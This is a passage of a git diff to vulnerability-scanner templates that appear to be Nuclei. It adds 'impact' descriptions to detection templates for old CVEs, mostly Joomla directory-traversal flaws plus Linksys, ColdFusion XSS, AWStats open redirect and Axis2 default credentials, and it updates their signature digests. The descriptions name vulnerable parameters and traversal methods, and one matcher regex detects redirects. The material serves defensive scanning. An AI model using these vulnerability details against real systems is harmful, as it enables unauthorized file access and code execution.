+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: |
     Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bf287275ed797bae0cb3d5d4acfc9b8e5bd3828436e45f96592c55c65cb1baa4022100ef79bc142d4be9f1c8cdca1b30e44293bf696b5686318e5ae13a18638f2267ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c631ca9827b32f40f6e831f6b142d509929a3a274aaa2539bd9a3bc70a6a277902202282dc777de13ade8043e5e0b684506c08b0f8362cece8841ae64f2d12922f4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml
index 5edad531aa..66e6bfa43e 100644
--- a/http/cves/2009/CVE-2009-1558.yaml
+++ b/http/cves/2009/CVE-2009-1558.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022072672def0c3c68dd608f3004581175afa8c339fb1dbe169c26b79537cc7a0619022100c7d94e2588ae1fc4f1093b3f7e02e4d2aa8e3d985506056636a77e58ba170c1f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009c71a1215235e49ed75ae5b6eeee4ad1e9cf5c5fbc2255aa4d4100800dbcc4ba022100814e7f6abe3bd9504fea75427a7595f0867986ff0f82ad2a6723448d3890a0ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml
index 81d0a7f865..ce82b92d4a 100644
--- a/http/cves/2009/CVE-2009-1872.yaml
+++ b/http/cves/2009/CVE-2009-1872.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: medium
   description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f880585c3b7a9bf4bace78a0d12cc7b59987555063071d3b42d5a6ec991e5fc402206d9ea98a5964a7b6b3fd001ec59a4a6a4018795896552e88707057bbf2984cf1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bcb065b4315286d0190f8d478c738b86bc6bbf0a9eee7e6b4c473e41e01c1802022100c1f7c414f91bd4fa0876cc2bd72f1be77b892b1d20003177d66640667e38aa3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml
index cda2bb459b..4ca2de61da 100644
--- a/http/cves/2009/CVE-2009-2015.yaml
+++ b/http/cves/2009/CVE-2009-2015.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
+  impact: |
+    The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.
   remediation: |
     Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ecd994a0eb2717ce10c4b5c91e5280c1fd8fac39010ab27a6e7dd81ad84421d3022061a0659d0ab3cf0e69480b1407ab7d15ea63da4942aa97535f935fe18c40d1ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d8c26e00ba2ed5716865bac39ee41243548410e07a5e04e196f13ecb86b5f6f0022029bacb42734f85338a1131945160673281e9ebda83ca881f2aba07019b4c2330:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml
index 0e4ce039d9..57cfc09f72 100644
--- a/http/cves/2009/CVE-2009-2100.yaml
+++ b/http/cves/2009/CVE-2009-2100.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
   remediation: |
     Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100843946ac00e19969b2641e5f8b8c44b890e6dd8226f04c95aa84a62843d6219b0221009a53d57de2bfea8a7b8bb17dd7fd7b8ae9299a4080a7610269331a945dc481df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210091f181784616328a479c0a45ea51ca6e3ec45cf35125c50b1a74018f9dd535a7022100dc27152143b4d3818133866645b2e1e1f647b142875a267d0667d9e9c7c867f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml
index 4fa1250de8..af5743455d 100644
--- a/http/cves/2009/CVE-2009-3053.yaml
+++ b/http/cves/2009/CVE-2009-3053.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b811a5bc6dc389222b5a3b2f6348b1bcdc4da180e2f621afdd6b06581e7db2be022100f760318fa5da56e59b4164508d2560e355438a21041091b07eb695f19467d51d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a1f28b173218b3d629d38aced121196c827be859dc4aca670b95c7b18307b430022049aa913dbdffabe7a2c1cf439f0b580f53add89ba434c8ad0a2a22652bd51bc4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml
index b5b5fe5691..0500d83687 100644
--- a/http/cves/2009/CVE-2009-3318.yaml
+++ b/http/cves/2009/CVE-2009-3318.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
+  impact: |
+    The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure.
   remediation: |
     Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022025c84025809994ed122c6b1eee98bcf3d7b45244c28b2e007708b624f8fed7ca022100e65d6b60af4d2ac032f3e91762da0bb8d31027cf10958a2c6de7112ec4c2aa69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205a8d55e39ef2ea81aef6917c75f74e1c17a628dc7048d68593bbf43b03dc8d86022100ebf7f9db037558e784a25d3fbb3d33cd5aaaa5cfef70c4974e29a2bc48f623b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml
index c34bbe52a1..a3da99748f 100644
--- a/http/cves/2009/CVE-2009-4202.yaml
+++ b/http/cves/2009/CVE-2009-4202.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: |
     Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100cc34793390f6a455392251d314e76db191c695bb242f901992f2fed5d30deb2a02203db9da85de2f6409024c76ec318dee40be8344b6c1484486afbb1a6986bcf231:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220039a98604f42ee7ccff3678a04d529befe9dd08295868ac0d4e6e725a91cbfd10220045ad4a883e12545de1290ad6fed5f97abefbc452ac43de71e42e1904acbebb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml
index dbf62e2b38..4cab0df46c 100644
--- a/http/cves/2009/CVE-2009-4223.yaml
+++ b/http/cves/2009/CVE-2009-4223.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: high
   description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
+  impact: |
+    An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure.
   remediation: |
     Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a31c2cc438bd399b0ff46d0737df967df4f8636a9545dacfb35f4c0fd16fbfe8022100d8ff3adcae6bbe7f02f215edf09b98d9890993edad83c73ddbfad540d5862f9e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f241e186edb9af52a94d640b6a9e57852c75c54669bd59af1aafb3cf6ee08258022100c680d5c1c0b6b27a520c2401d2c1aa0a9978874b840bf8f52c24ba6fc4c50121:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml
index f7d8a7e9b7..be572176b2 100644
--- a/http/cves/2009/CVE-2009-4679.yaml
+++ b/http/cves/2009/CVE-2009-4679.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008b806c6b509027ab419fab38023c2270cef1e3f60dc3b633fcacb5f8983dd8cf02205a10ec21151ba918555d2ea46f2e687dc5d87cec0d39ebc0a0b57409e230999f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd99275b8ffe3388f14498c542a677e467dc6409ffdede89b682d47aa5e98d8b02205e878695cd94db9f7e485d448c02aa9df416a8c7cfd6d160dc8197f103e279d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml
index 93bf8a58c2..08a8e291fd 100644
--- a/http/cves/2009/CVE-2009-5020.yaml
+++ b/http/cves/2009/CVE-2009-5020.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
+  impact: |
+    Allows attackers to redirect users to malicious websites or phishing pages.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2009-5020
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022014c3212369c069e74aced2e09cce019e7e3b3886dfccc0ba176b48f527d4b043022100f78dc1e0ff2cac698e269f9ef77e3fcdcd42093d0b5e83408b716fe56dc61a24:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200bd227f253fce18d4e4dd678a4cc08f7497a6058e0f1f1b544eb1e5ba22785f7022069b1097b262d7b9c4eb7fc023566c7c5ed00eba4c26e9dbf4400cbb4b4b9cc58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml
index 6b4c683be3..4fcbcb99ec 100644
--- a/http/cves/2009/CVE-2009-5114.yaml
+++ b/http/cves/2009/CVE-2009-5114.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
+  impact: |
+    An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/36994
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b6c44cb3482f8af652dee916a6c29922919394156205dd5af4613be52de7636c0220267ff1847f78cf578c20c01583d01239ad9f6e99849d7ba6c676758599057209:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c11864aea146ea6435caa4fa55436335832385d19a76a69f9b1e4d0715768f20022064458c5f14208af4e71638abc8560be81a228ca423a9dfbcf3bed250a4e70ed8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml
index 0accd4e0c6..47a5d2a53f 100644
--- a/http/cves/2010/CVE-2010-0157.yaml
+++ b/http/cves/2010/CVE-2010-0157.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/10943
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ceeedcc9f9dd5600c7fc59e5441a85a74f2cf464291aaaf3aff0e3a10ff69453022100d99175c115a1b1205fa7d13ea7fc618f6db58e8b226011dfc16aa015c67b1064:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100862d6d8773869cf58419d323a548a4fe4934ffe52e1a773f8332d9c8bbb0efb60221008df16010b4804b0f237b8798cc9cdc67311efd336768a46455967917e0f4bac8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml
index 12c6d0ec15..3aa975a83c 100644
--- a/http/cves/2010/CVE-2010-0219.yaml
+++ b/http/cves/2010/CVE-2010-0219.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data.
   remediation: |
     Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008aeb0223b59b1f43d1b5d86891682f6fdabd96f95cf747888a3ea67ea2d961a0022100ebb625cdd128e413ab38e6562e20e3b8cebdf838ac95c99355133af62512e6a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100da41e43897f5784bf8aa6bc1dfb5721db7618454aaf6c4182246a13b30b47a86022100ca97f29ef3b646a1cdf2f366ed582fdbfcf01a0a1c1c32ba84089c386e96edf1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml
index dbe1f28190..3c83303be4 100644
--- a/http/cves/2010/CVE-2010-0467.yaml
+++ b/http/cves/2010/CVE-2010-0467.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
   remediation: Apply all relevant security patches and upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11282
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204dc0e897ea68285bef1f12bcf5834d2cf101e68c156ce46626c2a06f4985d407022100822e5427795b4bd8e13344064b70a624e097115c521a1eea3ec95769751e9e83:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200df40dfac907595943e5906f98bfab1609a82ae9c703da4b7d0fb4ea5284c2b9022073136420b9d293e938fbbd6db582642f6c0f5836eda85d321af7e0855670c72b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml
index e823a0ff4c..2102ec0059 100644
--- a/http/cves/2010/CVE-2010-0696.yaml
+++ b/http/cves/2010/CVE-2010-0696.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
+  impact: |
+    An attacker can exploit this vulnerability to retrieve arbitrary files from the server.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/11447
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100aecd172f508073b0b8d64784bcb420de171daff3e0a8732d29ac71488c81596f022100f9b3c9f9ed1f055178cca21e303628b061871cbbd562c6202a00d7a71ced76e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100801f99e10fa7f37fb9a01ff4c8eb0a4b11e2193c7e16b9c3b8a0c50ca6e4a242022077c086d823e3b8131dff5b37562334ce5fb778ead2312cb35f1b49c8fc26f8fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml
index 29cd373d06..3d6f5cab73 100644
--- a/http/cves/2010/CVE-2010-0759.yaml
+++ b/http/cves/2010/CVE-2010-0759.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/11498
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205591d9316f159c3eb27f1e668e68d61205761aaa141dbe50f406eb90e779fa5602207db633a31bf0a118f73eed7a38df4e593557497eafcd2199a5435cf7bf09c1d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220255aee4e219ee166e143888630a4e6af23c3e9b385d922dd866339bdc5d96be2022071f5391c8ceecfede26dd5441388c1f6728c9f693e05b50f408851b94f23f21a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml
index 31ebe56064..d8d2e8e160 100644
--- a/http/cves/2010/CVE-2010-0942.yaml
+++ b/http/cves/2010/CVE-2010-0942.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11089
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022006730e9bc41d35c653ab87390772b2a4df527eb5cb3c9344d8dd31c4a2fc4f4202201c6ad57ef58398872f397ae0061c50864c955cd569b5f40316da8f32f5f15289:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022078b7a4981e20f380f36effbae103d8a364963690fa024b7b4b7f0a7731eb4faa022074cef19a8c876a25c892881ca87de44f31f764fac0538c01c8de31916e40390c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml
index 06b53b272d..e423797e96 100644
--- a/http/cves/2010/CVE-2010-0943.yaml
+++ b/http/cves/2010/CVE-2010-0943.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server.
   remediation: |
     Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b4abc2e6bac634509e9798e53e57b2bf8a45ca56ea0a39fd25d23d5cdffeabe102204899c1bede7831fe28b97c5b8da0cc7813575cd66ce76771af9cda761cfefc91:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fe6e90550c4cac8714140e552ca1f8dffae1d1cf10acfda1fc2a4f1eeb04e6070220261fe0eb98e8dd254ca2bcec2deb3e7ca3c6a2bb20a00488f400c2ba4764814d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml
index a0c069d86b..b9411f790a 100644
--- a/http/cves/2010/CVE-2010-0944.yaml
+++ b/http/cves/2010/CVE-2010-0944.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11088
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210093fe6fc6aafb9aae82395913f89c943a912983b9c5963c6f58f9b5fa0209f5c9022100f3694c1e8c9202a4cf29516761dba19426b82ac5ac959b3c88540c780c35b698:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210087ecb7ece9df8ee3e3e0fc6760a67762868e12f33b0c59f6ea3bc3ccc135a1b10220607ba4bacb84ca32dd3502bcd9973930e71855eb417a6afbb0bc270df349b136:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml
index 3bf1da94b0..af6e5f85dd 100644
--- a/http/cves/2010/CVE-2010-0972.yaml
+++ b/http/cves/2010/CVE-2010-0972.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/11738
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a6b583f7a3d7c073b0520d3c46a03a8381d6af0c086b1e37d29a024ce3a4736f022100cceb855f29d8dbef1c720e88cc3b9e57f023e4eeed5ff44b55a8b3c5f105e020:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100835d6327ecf3d8a79d891ab1671b58279390bedc0356214c4e0de666716a7abf022100e97639abcc162d391b35333f8165ab636eb06cff21510992ef20035e525b535f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml
index 9557b32d20..16da120308 100644
--- a/http/cves/2010/CVE-2010-0982.yaml
+++ b/http/cves/2010/CVE-2010-0982.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/10942
@@ -37,4 +39,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207804d47856db88004e7d770a6b9e4905869a3bf0bb5f80c77a0db3fc02ab2e0702207ef90a49afdf02b83e9ae8900297deec4d77ec96ed9e67afa4ad99a64d3c1da5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022004764a55873eedeef437f72de5243dc952d7938bf93ba6a44be94b1e3203d4b40221009e8e1775682357e291ce78522ca980a6d8238ef79e4e6f7cf72548f7e5bec5aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml
index 569a077687..e19aab2f21 100644
--- a/http/cves/2010/CVE-2010-0985.yaml
+++ b/http/cves/2010/CVE-2010-0985.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
   remediation: Apply all relevant security patches and product upgrades.
   reference:
     - https://www.exploit-db.com/exploits/10948
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022055b85a1187baab16c8619c44f333fa95a769f02d9c90cdc3b92da9af37ea765c022100ec5a4ddaf568dd08d9c499fa59981a08562d8b461b1d21bb0dc8d0479619d3b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f11e7c1ef169ed3e6f170b354e5066def58df0ecb303905be2cb692bc749d50f022100bc2fa70ab2d2506cdd3c9d9a30d099823223d9a45ca34c9ebef974f8ebb45242:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml
index 36ded21767..2f02fa0e59 100644
--- a/http/cves/2010/CVE-2010-1056.yaml
+++ b/http/cves/2010/CVE-2010-1056.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
